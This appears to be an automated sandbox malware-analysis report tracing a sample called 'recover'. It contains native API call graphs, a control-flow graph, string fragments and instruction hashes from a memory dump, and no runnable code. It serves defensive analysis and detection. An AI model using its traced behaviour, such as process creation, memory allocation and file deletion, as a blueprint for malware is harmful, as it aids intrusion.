2d17830 NtClose 75024->75025 75026 2d05b9a 75025->75026 75027 2d058f0 LdrInitializeThunk 75026->75027 75028 2d05bb7 75026->75028 75027->75028 75028->75011 75030 2d05c65 75029->75030 75033 2d05c95 75030->75033 75069 2d057e0 75030->75069 75032 2d05f31 75032->75007 75033->75032 75034 2d058f0 LdrInitializeThunk 75033->75034 75041 2d05e98 75033->75041 75035 2d05dc1 75034->75035 75037 2d05dcc 75035->75037 75035->75041 75036 2d058f0 LdrInitializeThunk 75038 2d05ee6 75036->75038 75039 2d17830 NtClose 75037->75039 75076 2d059a0 75038->75076 75044 2d05dd6 75039->75044 75041->75036 75042 2d17830 NtClose 75042->75032 75043 2d05ef6 75043->75042 75045 2d058f0 LdrInitializeThunk 75044->75045 75046 2d05e21 75045->75046 75047 2d17830 NtClose 75046->75047 75048 2d05e2b 75047->75048 75049 2d058f0 LdrInitializeThunk 75048->75049 75050 2d05e76 75049->75050 75051 2d059a0 LdrInitializeThunk 75050->75051 75052 2d05e86 75051->75052 75053 2d17830 NtClose 75052->75053 75054 2d05e90 75053->75054 75054->75007 75056 2d05915 75055->75056 75063 2d171b0 75056->75063 75059 2d17310 75060 2d1732a 75059->75060 75068 34b2ba0 LdrInitializeThunk 75060->75068 75061 2d1735a 75061->75022 75064 2d171ca 75063->75064 75067 34b2c60 LdrInitializeThunk 75064->75067 75065 2d05989 75065->75018 75065->75059 75067->75065 75068->75061 75071 2d05813 75069->75071 75070 2d05837 75070->75033 75071->75070 75080 2d173b0 75071->75080 75073 2d0585a 75073->75070 75074 2d17830 NtClose 75073->75074 75075 2d058dc 75074->75075 75075->75033 75077 2d059c6 75076->75077 75078 2d05a54 75077->75078 75085 2d17210 75077->75085 75078->75043 75081 2d173ca 75080->75081 75084 34b2ca0 LdrInitializeThunk 75081->75084 75082 2d173f6 75082->75073 75084->75082 75086 2d1722d 75085->75086 75089 34b3090 LdrInitializeThunk 75086->75089 75087 2d1725d 75087->75078 75089->75087 75257 2d06820 75259 2d06832 75257->75259 75258 2d06892 75259->75258 75261 2d0a410 75259->75261 75262 2d0a436 75261->75262 75263 2d0a655 75262->75263 75288 2d17c20 75262->75288 75263->75258 75265 2d0a4ac 75265->75263 75291 2d1a900 75265->75291 75267 2d0a4c8 75267->75263 75268 2d0a599 75267->75268 75269 2d16eb0 LdrInitializeThunk 75267->75269 75270 2d04ef0 LdrInitializeThunk 75268->75270 75272 2d0a5b8 75268->75272 75271 2d0a524 75269->75271 75270->75272 75271->75268 75275 2d0a52d 75271->75275 75276 2d0a63d 75272->75276 75300 2d16a80 75272->75300 75273 2d0a581 75277 2d07380 LdrInitializeThunk 75273->75277 75274 2d0a55f 75315 2d13050 LdrInitializeThunk 75274->75315 75275->75263 75275->75273 75275->75274 75297 2d04ef0 75275->75297 75282 2d07380 LdrInitializeThunk 75276->75282 75281 2d0a58f 75277->75281 75281->75258 75284 2d0a64b 75282->75284 75283 2d0a614 75305 2d16b20 75283->75305 75284->75258 75286 2d0a62e 75310 2d16c60 75286->75310 75289 2d17c3a 75288->75289 75290 2d17c48 CreateProcessInternalW 75289->75290 75290->75265 75292 2d1a870 75291->75292 75293 2d1a8cd 75292->75293 75294 2d197d0 RtlAllocateHeap 75292->75294 75293->75267 75295 2d1a8aa 75294->75295 75296 2d196f0 RtlFreeHeap 75295->75296 75296->75293 75298 2d17080 LdrInitializeThunk 75297->75298 75299 2d04f2b 75298->75299 75299->75274 75301 2d16af5 75300->75301 75303 2d16aa7 75300->75303 75316 34b39b0 LdrInitializeThunk 75301->75316 75302 2d16b1a 75302->75283 75303->75283 75306 2d16b95 75305->75306 75308 2d16b47 75305->75308 75317 34b4340 LdrInitializeThunk 75306->75317 75307 2d16bba 75307->75286 75308->75286 75311 2d16cd2 75310->75311 75313 2d16c84 75310->75313 75318 34b2fb0 LdrInitializeThunk 75311->75318 75312 2d16cf7 75312->75276 75313->75276 75315->75273 75316->75302 75317->75307 75318->75312 75319 2d09f20 75324 2d09c50 75319->75324 75321 2d09f2d 75338 2d098f0 75321->75338 75323 2d09f49 75325 2d09c75 75324->75325 75349 2d075d0 75325->75349 75328 2d09db2 75328->75321 75330 2d09dc9 75330->75321 75331 2d09dc0 75331->75330 75333 2d09eb1 75331->75333 75364 2d09350 75331->75364 75335 2d09f09 75333->75335 75373 2d096b0 75333->75373 75336 2d196f0 RtlFreeHeap 75335->75336 75337 2d09f10 75336->75337 75337->75321 75339 2d09906 75338->75339 75342 2d09911 75338->75342 75340 2d197d0 RtlAllocateHeap 75339->75340 75340->75342 75341 2d09927 75341->75323 75342->75341 75343 2d075d0 GetFileAttributesW 75342->75343 75344 2d09c1e 75342->75344 75347 2d09350 RtlFreeHeap 75342->75347 75348 2d096b0 RtlFreeHeap 75342->75348 75343->75342 75345 2d09c37 75344->75345 75346 2d196f0 RtlFreeHeap 75344->75346 75345->75323 75346->75345 75347->75342 75348->75342 75350 2d075f1 75349->75350 75351 2d075f8 GetFileAttributesW 75350->75351 75352 2d07603 75350->75352 75351->75352 75352->75328 75353 2d11ca0 75352->75353 75354 2d11cae 75353->75354 75355 2d11cb5 75353->75355 75354->75331 75356 2d03cc0 LdrLoadDll 75355->75356 75357 2d11cea 75356->75357 75358 2d11cf9 75357->75358 75377 2d11780 LdrLoadDll 75357->75377 75360 2d197d0 RtlAllocateHeap 75358->75360 75362 2d11e91 75358->75362 75363 2d11d12 75360->75363 75361 2d196f0 RtlFreeHeap 75361->75362 75362->75331 75363->75361 75363->75362 75365 2d09376 75364->75365 75378 2d0cb70 75365->75378 75367 2d093dd 75369 2d0955a 75367->75369 75370 2d093fb 75367->75370 75368 2d0953f 75368->75331 75369->75368 75371 2d09210 RtlFreeHeap 75369->75371 75370->75368 75383 2d09210 75370->75383 75371->75369 75374 2d096d6 75373->75374 75375 2d0cb70 RtlFreeHeap 75374->75375 75376 2d09752 75375->75376 75376->75333 75377->75358 75380 2d0cb86 75378->75380 75379 2d0cb93 75379->75367 75380->75379 75381 2d196f0 RtlFreeHeap 75380->75381 75382 2d0cbc6 75381->75382 75382->75367 75384 2d09226 75383->75384 75387 2d0cbe0 75384->75387 75386 2d0932c 75386->75370 75388 2d0cc04 75387->75388 75389 2d0cc9c 75388->75389 75390 2d196f0 RtlFreeHeap 75388->75390 75389->75386 75390->75389 75090 2d16e60 75091 2d16e7a 75090->75091 75094 34b2df0 LdrInitializeThunk 75091->75094 75092 2d16ea2 75094->75092 75095 2d109e0 75100 2d109ef 75095->75100 75096 2d10a78 75097 2d10a36 75098 2d196f0 RtlFreeHeap 75097->75098 75099 2d10a42 75098->75099 75100->75096 75100->75097 75101 2d10a73 75100->75101 75102 2d196f0 RtlFreeHeap 75101->75102 75102->75096 75391 2d176a0 75392 2d1773c 75391->75392 75394 2d176c4 75391->75394 75393 2d17752 NtReadFile 75392->75393 75395 2cf9330 75396 2cf96e5 75395->75396 75398 2cf9b40 75396->75398 75399 2d19380 75396->75399 75400 2d193a6 75399->75400 75405 2cf3d60 75400->75405 75402 2d193b2 75403 2d193e0 75402->75403 75408 2d13e50 75402->75408 75403->75398 75412 2d02a00 75405->75412 75407 2cf3d6d 75407->75402 75409 2d13eaa 75408->75409 75411 2d13eb7 75409->75411 75423 2d00ec0 75409->75423 75411->75403 75413 2d02a17 75412->75413 75415 2d02a30 75413->75415 75416 2d18270 75413->75416 75415->75407 75418 2d18288 75416->75418 75417 2d182ac 75417->75415 75418->75417 75419 2d16eb0 LdrInitializeThunk 75418->75419 75420 2d182fe 75419->75420 75421 2d196f0 RtlFreeHeap 75420->75421 75422 2d18317 75421->75422 75422->75415 75424 2d00ef8 75423->75424 75439 2d07110 75424->75439 75426 2d00f00 75427 2d011c6 75426->75427 75428 2d197d0 RtlAllocateHeap 75426->75428 75427->75411 75429 2d00f16 75428->75429 75430 2d197d0 RtlAllocateHeap 75429->75430 75431 2d00f27 75430->75431 75432 2d197d0 RtlAllocateHeap 75431->75432 75434 2d00f38 75432->75434 75437 2d00fc8 75434->75437 75450 2d05f40 75434->75450 75435 2d03cc0 LdrLoadDll 75436 2d01183 75435->75436 75473 2d16570 75436->75473 75437->75435 75440 2d0713c 75439->75440 75441 2d07000 2 API calls 75440->75441 75442 2d0715f 75441->75442 75443 2d07181 75442->75443 75444 2d07169 75442->75444 75445 2d0719d 75443->75445 75448 2d17830 NtClose 75443->75448 75446 2d07174 75444->75446 75447 2d17830 NtClose 75444->75447 75445->75426 75446->75426 75447->75446 75449 2d07193 75448->75449 75449->75426 75451 2d05f65 75450->75451 75452 2d057e0 2 API calls 75451->75452 75454 2d05f99 75451->75454 75452->75454 75453 2d060b6 75453->75437 75454->75453 75455 2d05a70 3 API calls 75454->75455 75456 2d0602f 75455->75456 75457 2d0603a 75456->75457 75458 2d058f0 LdrInitializeThunk 75456->75458 75457->75437 75459 2d060ed 75458->75459 75460 2d061a2 75459->75460 75462 2d17830 NtClose 75459->75462 75461 2d05a70 3 API calls 75460->75461 75463 2d061b8 75461->75463 75467 2d06102 75462->75467 75464 2d05c40 4 API calls 75463->75464 75466 2d061bf 75463->75466 75465 2d061f9 75464->75465 75465->75437 75466->75437 75468 2d058f0 LdrInitializeThunk 75467->75468 75469 2d0614d 75468->75469 75470 2d17830 NtClose 75469->75470 75471 2d06157 75470->75471 75472 2d058f0 LdrInitializeThunk 75471->75472 75472->75460 75474 2d165ca 75473->75474 75476 2d165d7 75474->75476 75477 2d011e0 75474->75477 75476->75427 75493 2d073e0 75477->75493 75479 2d01200 75486 2d016e8 75479->75486 75497 2d10020 75479->75497 75482 2d01405 75484 2d1a900 2 API calls 75482->75484 75483 2d0125b 75483->75486 75501 2d1a7d0 75483->75501 75487 2d0141a 75484->75487 75485 2d07380 LdrInitializeThunk 75489 2d01445 75485->75489 75486->75476 75487->75489 75506 2cffe80 75487->75506 75489->75485 75489->75486 75490 2cffe80 LdrInitializeThunk 75489->75490 75490->75489 75491 2d01579 75491->75489 75492 2d07380 LdrInitializeThunk 75491->75492 75492->75491 75494 2d073ed 75493->75494 75495 2d07415 75494->75495 75496 2d0740e SetErrorMode 75494->75496 75495->75479 75496->75495 75498 2d10033 75497->75498 75499 2d19660 NtAllocateVirtualMemory 75498->75499 75500 2d10041 75499->75500 75500->75483 75502 2d1a7e0 75501->75502 75503 2d1a7e6 75501->75503 75502->75482 75504 2d197d0 RtlAllocateHeap 75503->75504 75505 2d1a80c 75504->75505 75505->75482 75509 2d17aa0 75506->75509 75510 2d17abd 75509->75510 75513 34b2c70 LdrInitializeThunk 75510->75513 75511 2cffea2 75511->75491 75513->75511

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 28 2cf9330-2cf96de 29 2cf96e5-2cf96f1 28->29 30 2cf96f3-2cf970e 29->30 31 2cf9710-2cf971a 29->31 30->29 32 2cf972b-2cf9737 31->32 33 2cf974d-2cf9765 32->33 34 2cf9739-2cf974b 32->34 35 2cf9776-2cf9782 33->35 34->32 37 2cf9798-2cf97a2 35->37 38 2cf9784-2cf9796 35->38 40 2cf97b3-2cf97bf 37->40 38->35 41 2cf97d7 40->41 42 2cf97c1-2cf97ca 40->42 45 2cf97de-2cf97e7 41->45 43 2cf97cc-2cf97d2 42->43 44 2cf97d5 42->44 43->44 44->40 47 2cf980c-2cf9815 45->47 48 2cf97e9-2cf980a 45->48 49 2cf981b-2cf9825 47->49 50 2cf9a89-2cf9a93 47->50 48->45 52 2cf9836-2cf983f 49->52 51 2cf9aa4-2cf9aad 50->51 55 2cf9abf-2cf9ac9 51->55 56 2cf9aaf-2cf9ab5 51->56 53 2cf985d-2cf9875 52->53 54 2cf9841-2cf984d 52->54 59 2cf98ba-2cf98be 53->59 60 2cf9877-2cf9881 53->60 57 2cf984f-2cf9855 54->57 58 2cf985b 54->58 63 2cf9ada-2cf9ae3 55->63 61 2cf9abd 56->61 62 2cf9ab7-2cf9aba 56->62 57->58 58->52 69 2cf98e7-2cf98ee 59->69 70 2cf98c0-2cf98e5 59->70 65 2cf9892-2cf989e 60->65 61->51 62->61 67 2cf9ae5-2cf9af2 63->67 68 2cf9af4-2cf9afe 63->68 71 2cf98b5 65->71 72 2cf98a0-2cf98b3 65->72 67->63 74 2cf9b0f-2cf9b18 68->74 75 2cf9920-2cf992a 69->75 76 2cf98f0-2cf991e 69->76 70->59 71->50 72->65 78 2cf9b2e-2cf9b35 74->78 79 2cf9b1a-2cf9b2c 74->79 80 2cf995e-2cf9962 75->80 81 2cf992c-2cf994b 75->81 76->69 85 2cf9b3b call 2d19380 78->85 86 2cf9c66-2cf9c70 78->86 79->74 82 2cf9964-2cf9981 80->82 83 2cf9983-2cf998a 80->83 87 2cf994d-2cf9956 81->87 88 2cf995c 81->88 82->80 90 2cf998c-2cf99b9 83->90 91 2cf99bb-2cf99c5 83->91 92 2cf9b40-2cf9b47 85->92 87->88 88->75 90->83 93 2cf99fb-2cf9a02 91->93 94 2cf99c7-2cf99d7 91->94 95 2cf9b49-2cf9b54 92->95 96 2cf9b84-2cf9b8e 92->96 99 2cf9a39-2cf9a42 93->99 100 2cf9a04-2cf9a37 93->100 97 2cf99ea-2cf99f3 94->97 98 2cf99d9-2cf99e8 94->98 101 2cf9b5b-2cf9b5d 95->101 102 2cf9b56-2cf9b5a 95->102 103 2cf9b9f-2cf9ba8 96->103 104 2cf99f9 97->104 98->104 105 2cf9a4f-2cf9a55 99->105 106 2cf9a44-2cf9a4d 99->106 100->93 107 2cf9b5f-2cf9b68 101->107 108 2cf9b6e-2cf9b82 101->108 102->101 109 2cf9bbe-2cf9bc8 103->109 110 2cf9baa-2cf9bbc 103->110 104->91 111 2cf9a5b-2cf9a84 105->111 106->111 107->108 108->92 113 2cf9bd9-2cf9be5 109->113 110->103 111->47 114 2cf9c07-2cf9c0e 113->114 115 2cf9be7-2cf9bf4 113->115 116 2cf9c2f-2cf9c39 114->116 117 2cf9c10-2cf9c2d 114->117 118 2cf9bf6-2cf9bff 115->118 119 2cf9c05 115->119 121 2cf9c4a-2cf9c56 116->121 117->114 118->119 119->113 121->86 122 2cf9c58-2cf9c64 121->122 122->121
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_2cf0000_recover.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !$($(w$*$5$5i$6$=C$?$Fi$K$KD$M2o@$R$S$^P$_$c$i$i^$ke$o@$t/$x$.$I
                                                  • API String ID: 0-3493999792
                                                  • Opcode ID: 94c70345593873644bfbd344ff3a2dc94fdbe0ea5560730816e231702e6ea5c2
                                                  • Instruction ID: 106c8df019da1ad57be5bd22673f2cd971b934c2b364d33f850791e5ef39be19
                                                  • Opcode Fuzzy Hash: 94c70345593873644bfbd344ff3a2dc94fdbe0ea5560730816e231702e6ea5c2
                                                  • Instruction Fuzzy Hash: 11329DB0D05629CBEFA4CF45C994BDDBBB2BB85308F1081D9C14D6B290DBB95A89CF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 02D0B794
                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 02D0B7CF
                                                  • FindClose.KERNELBASE(?), ref: 02D0B7DA
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_2cf0000_recover.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNext
                                                  • String ID:
                                                  • API String ID: 3541575487-0
                                                  • Opcode ID: b9b68ed8906b681f8a9c2fafafeb8ff47cf114d538c340c918f751ab0c45e9fc
                                                  • Instruction ID: 104cbe7ece4d02daad34b4c1e9b84f20609e2ca2761824c59cf8d65adce4a878
                                                  • Opcode Fuzzy Hash: b9b68ed8906b681f8a9c2fafafeb8ff47cf114d538c340c918f751ab0c45e9fc
                                                  • Instruction Fuzzy Hash: 43316E71900308BBDB21DB60CC85FEE777DDF84759F144499B909A62D0EBB0AE84CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02D17636
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_2cf0000_recover.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: a356fb9f391d22bc023d17fced6cf566d01fd8927099e6bc6bd4c3fa16281635
                                                  • Instruction ID: bce9a2e435bd3c1922350549d4724e40c706e8371301d7a8a6ecf1dcfbc78dab
                                                  • Opcode Fuzzy Hash: a356fb9f391d22bc023d17fced6cf566d01fd8927099e6bc6bd4c3fa16281635
                                                  • Instruction Fuzzy Hash: 8231A3B5A10609ABDB54DF98D880EDEB7F9EF8C314F108219F918A7340D770A851CFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02D1777B
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_2cf0000_recover.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 7b6d4123d104f88c1fd93134fee408cf11add3b1a2f79cad4eb40babad28b290
                                                  • Instruction ID: 125815df7632c3258350d1164ebf96d95c361dd952976d9d74f0a56836f710b5
                                                  • Opcode Fuzzy Hash: 7b6d4123d104f88c1fd93134fee408cf11add3b1a2f79cad4eb40babad28b290
                                                  • Instruction Fuzzy Hash: FB31C9B5A00609AFDB14DF99E880EEFB7B9EF88314F104619F918A7340D770A911CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(02D0125B,?,02D165D7,00000000,00000004,00003000,?,?,?,?,?,02D165D7,02D0125B,02D165D7,C4831055,02D0125B), ref: 02D17A3D
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_2cf0000_recover.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: f4f91bf21cb80df1bc328c77d6b9f739ef42a487551bc10fcda7f7f055a2c69e
                                                  • Instruction ID: 32e89ffa112245b1c3722edf7d012fc614c2aeccf64161a19ea2d5d537012137
                                                  • Opcode Fuzzy Hash: f4f91bf21cb80df1bc328c77d6b9f739ef42a487551bc10fcda7f7f055a2c69e
                                                  • Instruction Fuzzy Hash: D2210AB5A00249ABDB14DF58DC51FAFB7A9EF88310F008619F918A7340D774A911CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_2cf0000_recover.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  • Opcode ID: bd26aa608107ec9c5d63adf2a9baca50a4eb1adc4cdcc97e817f120ef4398a31
                                                  • Instruction ID: 719773079d3875b31fe4c62c7d80d2ac200369fa56c19128f8c73a426387e551
                                                  • Opcode Fuzzy Hash: bd26aa608107ec9c5d63adf2a9baca50a4eb1adc4cdcc97e817f120ef4398a31
                                                  • Instruction Fuzzy Hash: 8201C471A403047BE610EBA8EC05FAB77ADDF85710F004649FA18A7280DBB17901CBF5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02D17867
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_2cf0000_recover.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: f795786775cb9a2c2b4d1298acb719380e3e063c459c564a671cc176a00a7ae3
                                                  • Instruction ID: 41c8a4e9b47f3a249c7fb94c35370e8e5482981dc1c06387dc1cbaee66892739
                                                  • Opcode Fuzzy Hash: f795786775cb9a2c2b4d1298acb719380e3e063c459c564a671cc176a00a7ae3
                                                  • Instruction Fuzzy Hash: 0AE04632200204BBD660EA69EC00FDBBBADDBC5760F008019FA08A7240C7B1B9058BB5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 315597fc52f11367ddedb0a798f7802be185d8b25d290f4fcf0453fb38c7ff63
                                                  • Instruction ID: d63241a2a18aae7373b483b7c1a3fc93c6d21edbf596a3a91ed62631e2375831
                                                  • Opcode Fuzzy Hash: 315597fc52f11367ddedb0a798f7802be185d8b25d290f4fcf0453fb38c7ff63
                                                  • Instruction Fuzzy Hash: 89900235615844129180B15948845464005D7F0301B55C016E0424954C8B168A565365
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 7a77499930135c4b8784b762be7545823988164dd2edb78e4b5f3b9163b35a22
                                                  • Instruction ID: 194127ae8b747c2fce111142970f21effbc7f205b73678a29a3ad17d39687752
                                                  • Opcode Fuzzy Hash: 7a77499930135c4b8784b762be7545823988164dd2edb78e4b5f3b9163b35a22
                                                  • Instruction Fuzzy Hash: 8190022525144C02D180B15984147070006C7E0601F55C016A0024954D87178A6566B5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 351fec6fe3895cbe330068aa5ae1b892fac6927765cbb007e6e26103302b34c6
                                                  • Instruction ID: 9b9a2e21730fc07f91e79bc385b7b080d14ee76abbd181e5c9ae828a9f952f60
                                                  • Opcode Fuzzy Hash: 351fec6fe3895cbe330068aa5ae1b892fac6927765cbb007e6e26103302b34c6
                                                  • Instruction Fuzzy Hash: 06900265611544424180B15948044066005D7F1301395C11AA0554960C871A8955926D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 3f584a86bc515a34406cd8e798b925bdb346b08b14fe68530d7fb56c7379c32b
                                                  • Instruction ID: a28be837a315b24b01e2c571c06a5ad818e824069138c0ced60e704927e37614
                                                  • Opcode Fuzzy Hash: 3f584a86bc515a34406cd8e798b925bdb346b08b14fe68530d7fb56c7379c32b
                                                  • Instruction Fuzzy Hash: BE90023561554802D140B15945147061005C7E0201F65C416A0424968D87978A5165A6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ba525b74b6ff394dc2a79de79d903b23298d614244ccbafdf1627ba02ccef37b
                                                  • Instruction ID: 333f4155ea7d87c4d7e209d1a3297d70c7233d6824bc580103251f9ea9a8aa77
                                                  • Opcode Fuzzy Hash: ba525b74b6ff394dc2a79de79d903b23298d614244ccbafdf1627ba02ccef37b
                                                  • Instruction Fuzzy Hash: 3A900265212444034145B1594414616400AC7F0201B55C026E1014990DC72789916129
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 0797e1425330bd5b4e4d2565232113497a7d5c1e285f7739220333ce6e9294a5
                                                  • Instruction ID: 396b6570f076104d5c1150ea48d56f7a7c2dc83594881e9c6741e6237db4f4f4
                                                  • Opcode Fuzzy Hash: 0797e1425330bd5b4e4d2565232113497a7d5c1e285f7739220333ce6e9294a5
                                                  • Instruction Fuzzy Hash: 0B90023521548C42D180B1594404A460015C7E0305F55C016A0064A94D97278E55B665
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.3358868030.0000000003440000.00000040.00001000.00020000.00000000.sdmp, Offset: 03440000, based on PE: true
                                                  • Associated: 0000000D.00000002.3358868030.0000000003569000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.000000000356D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000D.00000002.3358868030.00000000035DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_3440000_recover.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
